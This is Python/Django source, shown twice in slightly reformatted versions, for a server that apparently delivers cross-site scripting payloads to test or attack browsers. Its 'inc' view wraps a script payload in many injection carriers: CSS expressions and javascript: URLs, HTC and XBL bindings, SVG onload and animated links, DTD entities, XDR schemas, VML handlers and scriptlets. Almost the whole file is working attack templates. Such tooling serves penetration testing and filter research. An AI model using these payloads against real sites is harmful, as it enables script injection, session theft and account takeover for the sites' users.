def xss(request, vector_id): v = Vector.objects.get(id=vector_id) xss_instance = build_vector(v, xss_payload(), "xss") return HttpResponse(xss_instance.decode('string_escape'))
def xss(request, vector_id): v = Vector.objects.get(id=vector_id) xss_instance = build_vector(v, xss_payload(), "xss") return HttpResponse(xss_instance.decode("string_escape"))
def inc(request, context, vector_id, context_id, encoding_id, type): #return a given payload as an include like .js or .css etc... response = HttpResponse() if context == "xss": source = xss_payload() elif context == "test": baseurl = request.build_absolute_uri("/") domain = Site.objects.get_current() source = test_payload(vector_id, context_id, encoding_id, baseurl, domain) else: return HttpResponse("WTF BBQ?") if type == "css": css = """ background-image: url('javascript:%(eval_p)s;'); background-image: expression(%(eval_p)s); -moz-binding:url("%(xssmoz)s"); }{-o-link:'javascript:%(eval_p)s';-o-link-source: current;}""" eval_p = eval_payload(source) response['Content-type'] = 'text/css' response.write(css % {'eval_p': eval_p, 'xssmoz': ''}) return response elif type == "js": response['Content-type'] = 'application/javascript' response.write(source) return response elif type == "jpg": response['Content-type'] = 'image/jpeg' response.write(source) return response elif type == "htc": eval_p = eval_payload(source) htc = """ <?xml version="1.0"?> <x> <payload><![CDATA[<img src=x onerror=%(eval_p)s>]]></payload> </x> <PUBLIC:COMPONENT TAGNAME="xss"> <PUBLIC:ATTACH EVENT="ondocumentready" ONEVENT="main()" LITERALCONTENT="false"/> </PUBLIC:COMPONENT> <SCRIPT> function main() { """ + source + """; } </SCRIPT>""" response['Content-type'] = 'text/plain' response.write(htc % { 'eval_p': eval_p, }) return response elif type == "html": return render_to_response('payload.html', { 'source': source, }) elif type == "xbl": eval_p = eval_payload(source) xbl = """ <?xml version="1.0" ?><bindings xmlns="http://www.mozilla.org/xbl"><binding id="xss"><implementation><constructor><![CDATA[%(eval_p)s]]></constructor></implementation></binding></bindings>""" return HttpResponse(xbl % { 'eval_p': eval_p, }) elif type == "svg": eval_p = eval_payload(source) svg = """ <form xmlns="http://www.w3.org/1999/xhtml" target="_top" action="javascript:%(eval_p)s"><input value="XXX" type="submit"/></form> """ response['Content-type'] = 'image/svg+xml' response.write(svg % { 'eval_p': eval_p, }) return response elif type == "svg2": svg = """<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg onload="%(eval_p)s" xmlns="http://www.w3.org/2000/svg"><defs><font id="x"><font-face font-family="y"/></font></defs></svg>""" response['Content-type'] = 'image/svg+xml' eval_p = eval_payload(source) response.write(svg % { 'eval_p': eval_p, }) return response elif type == "svg3": svg = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <clipPath id="a" > <set xlink:href="#x" attributeName="xlink:href" begin="1s" to="javascript:%(eval_p)s" /> </clipPath> <pattern id="b"> <set xlink:href="#x" attributeName="xlink:href" begin="2s" to="javascript:%(eval_p)s" /> </pattern> <filter id="c"> <set xlink:href="#x" attributeName="xlink:href" begin="3s" to="javascript:%(eval_p)s" /> </filter> <marker id="d"> <set xlink:href="#x" attributeName="xlink:href" begin="4s" to="%(eval_p)s" /> </marker> <mask id="e"> <set xlink:href="#x" attributeName="xlink:href" begin="5s" to="javascript:%(eval_p)s" /> </mask> <linearGradient id="f"> <set xlink:href="#x" attributeName="xlink:href" begin="6s" to="javascript:%(eval_p)s" /> </linearGradient> </svg>""" response['Content-type'] = 'image/svg+xml' eval_p = eval_payload(source) response.write(svg % { 'eval_p': eval_p, }) return response elif type == "svg4": svg = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <marker id="a" markerWidth="1000" markerHeight="1000" refX="0" refY="0"> <a xlink:href="http://google.com"> <set attributeName="xlink:href" to="javascript:alert(1)" begin="1s" /> <rect width="1000" height="1000" fill="white"/> </a> </marker> </svg>""" response['Content-type'] = 'image/svg+xml' eval_p = eval_payload(source) response.write(svg % { 'eval_p': eval_p, }) return response elif type == "xxe": xxe = """<script xmlns="http://www.w3.org/1999/xhtml">%(eval_p)s</script>""" eval_p = eval_payload(source) return HttpResponse(xxe % { 'eval_p': eval_p, }) elif type == "dtd": dtd = """<!ENTITY x "<html:img src='x' xmlns:html='http://www.w3.org/1999/xhtml' onerror='%(eval_p)s'/>">""" eval_p = eval_payload(source) return HttpResponse(dtd % { 'eval_p': eval_p, }) elif type == "xdr": xdr = """<?xml version="1.0"?> <Schema name="x" xmlns="urn:schemas-microsoft-com:xml-data"> <ElementType name="img"> <AttributeType name="src" required="yes" default="x"/> <AttributeType name="onerror" required="yes" default="%(eval_p)s"/> <attribute type="src"/> <attribute type="onerror"/> </ElementType> </Schema>""" eval_p = eval_payload(source) return HttpResponse(xdr % { 'eval_p': eval_p, }) elif type == "evt": evt = """<script xmlns="http://www.w3.org/1999/xhtml" id="x">%(eval_p)s</script>""" eval_p = eval_payload(source) return HttpResponse(evt % { 'eval_p': eval_p, }) elif type == "vml": vml = """<xml> <rect style="height:100%;width:100%" id="xss" onmouseover="%(eval_p)s" strokecolor="white" strokeweight="2000px" filled="false" /> </xml>""" eval_p = eval_payload(source) return HttpResponse(vml % { 'eval_p': eval_p, }) elif type == "sct": sct = """<SCRIPTLET> <IMPLEMENTS Type="Behavior"></IMPLEMENTS> <SCRIPT Language="javascript">%(eval_p)s</SCRIPT> </SCRIPTLET>""" eval_p = eval_payload(source) return HttpResponse(sct % { 'eval_p': eval_p, }) elif type == "php": event = """Event: load\ndata: \n\n""" eval_p = eval_payload(source) response['Content-type'] = 'application/x-dom-event-stream' response.write(event) return response else: return HttpResponse("fail !")
def inc(request, context, vector_id, context_id, encoding_id, type): # return a given payload as an include like .js or .css etc... response = HttpResponse() if context == "xss": source = xss_payload() elif context == "test": baseurl = request.build_absolute_uri("/") domain = Site.objects.get_current() source = test_payload(vector_id, context_id, encoding_id, baseurl, domain) else: return HttpResponse("WTF BBQ?") if type == "css": css = """ background-image: url('javascript:%(eval_p)s;'); background-image: expression(%(eval_p)s); -moz-binding:url("%(xssmoz)s"); }{-o-link:'javascript:%(eval_p)s';-o-link-source: current;}""" eval_p = eval_payload(source) response["Content-type"] = "text/css" response.write(css % {"eval_p": eval_p, "xssmoz": ""}) return response elif type == "js": response["Content-type"] = "application/javascript" response.write(source) return response elif type == "jpg": response["Content-type"] = "image/jpeg" response.write(source) return response elif type == "htc": eval_p = eval_payload(source) htc = ( """ <?xml version="1.0"?> <x> <payload><![CDATA[<img src=x onerror=%(eval_p)s>]]></payload> </x> <PUBLIC:COMPONENT TAGNAME="xss"> <PUBLIC:ATTACH EVENT="ondocumentready" ONEVENT="main()" LITERALCONTENT="false"/> </PUBLIC:COMPONENT> <SCRIPT> function main() { """ + source + """; } </SCRIPT>""" ) response["Content-type"] = "text/plain" response.write(htc % {"eval_p": eval_p}) return response elif type == "html": return render_to_response("payload.html", {"source": source}) elif type == "xbl": eval_p = eval_payload(source) xbl = """ <?xml version="1.0" ?><bindings xmlns="http://www.mozilla.org/xbl"><binding id="xss"><implementation><constructor><![CDATA[%(eval_p)s]]></constructor></implementation></binding></bindings>""" return HttpResponse(xbl % {"eval_p": eval_p}) elif type == "svg": eval_p = eval_payload(source) svg = """ <form xmlns="http://www.w3.org/1999/xhtml" target="_top" action="javascript:%(eval_p)s"><input value="XXX" type="submit"/></form> """ response["Content-type"] = "image/svg+xml" response.write(svg % {"eval_p": eval_p}) return response elif type == "svg2": svg = """<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg onload="%(eval_p)s" xmlns="http://www.w3.org/2000/svg"><defs><font id="x"><font-face font-family="y"/></font></defs></svg>""" response["Content-type"] = "image/svg+xml" eval_p = eval_payload(source) response.write(svg % {"eval_p": eval_p}) return response elif type == "svg3": svg = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <clipPath id="a" > <set xlink:href="#x" attributeName="xlink:href" begin="1s" to="javascript:%(eval_p)s" /> </clipPath> <pattern id="b"> <set xlink:href="#x" attributeName="xlink:href" begin="2s" to="javascript:%(eval_p)s" /> </pattern> <filter id="c"> <set xlink:href="#x" attributeName="xlink:href" begin="3s" to="javascript:%(eval_p)s" /> </filter> <marker id="d"> <set xlink:href="#x" attributeName="xlink:href" begin="4s" to="%(eval_p)s" /> </marker> <mask id="e"> <set xlink:href="#x" attributeName="xlink:href" begin="5s" to="javascript:%(eval_p)s" /> </mask> <linearGradient id="f"> <set xlink:href="#x" attributeName="xlink:href" begin="6s" to="javascript:%(eval_p)s" /> </linearGradient> </svg>""" response["Content-type"] = "image/svg+xml" eval_p = eval_payload(source) response.write(svg % {"eval_p": eval_p}) return response elif type == "svg4": svg = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <marker id="a" markerWidth="1000" markerHeight="1000" refX="0" refY="0"> <a xlink:href="http://google.com"> <set attributeName="xlink:href" to="javascript:alert(1)" begin="1s" /> <rect width="1000" height="1000" fill="white"/> </a> </marker> </svg>""" response["Content-type"] = "image/svg+xml" eval_p = eval_payload(source) response.write(svg % {"eval_p": eval_p}) return response elif type == "xxe": xxe = """<script xmlns="http://www.w3.org/1999/xhtml">%(eval_p)s</script>""" eval_p = eval_payload(source) return HttpResponse(xxe % {"eval_p": eval_p}) elif type == "dtd": dtd = """<!ENTITY x "<html:img src='x' xmlns:html='http://www.w3.org/1999/xhtml' onerror='%(eval_p)s'/>">""" eval_p = eval_payload(source) return HttpResponse(dtd % {"eval_p": eval_p}) elif type == "xdr": xdr = """<?xml version="1.0"?> <Schema name="x" xmlns="urn:schemas-microsoft-com:xml-data"> <ElementType name="img"> <AttributeType name="src" required="yes" default="x"/> <AttributeType name="onerror" required="yes" default="%(eval_p)s"/> <attribute type="src"/> <attribute type="onerror"/> </ElementType> </Schema>""" eval_p = eval_payload(source) return HttpResponse(xdr % {"eval_p": eval_p}) elif type == "evt": evt = """<script xmlns="http://www.w3.org/1999/xhtml" id="x">%(eval_p)s</script>""" eval_p = eval_payload(source) return HttpResponse(evt % {"eval_p": eval_p}) elif type == "vml": vml = """<xml> <rect style="height:100%;width:100%" id="xss" onmouseover="%(eval_p)s" strokecolor="white" strokeweight="2000px" filled="false" /> </xml>""" eval_p = eval_payload(source) return HttpResponse(vml % {"eval_p": eval_p}) elif type == "sct": sct = """<SCRIPTLET> <IMPLEMENTS Type="Behavior"></IMPLEMENTS> <SCRIPT Language="javascript">%(eval_p)s</SCRIPT> </SCRIPTLET>""" eval_p = eval_payload(source) return HttpResponse(sct % {"eval_p": eval_p}) elif type == "php": event = """Event: load\ndata: \n\n""" eval_p = eval_payload(source) response["Content-type"] = "application/x-dom-event-stream" response.write(event) return response else: return HttpResponse("fail !")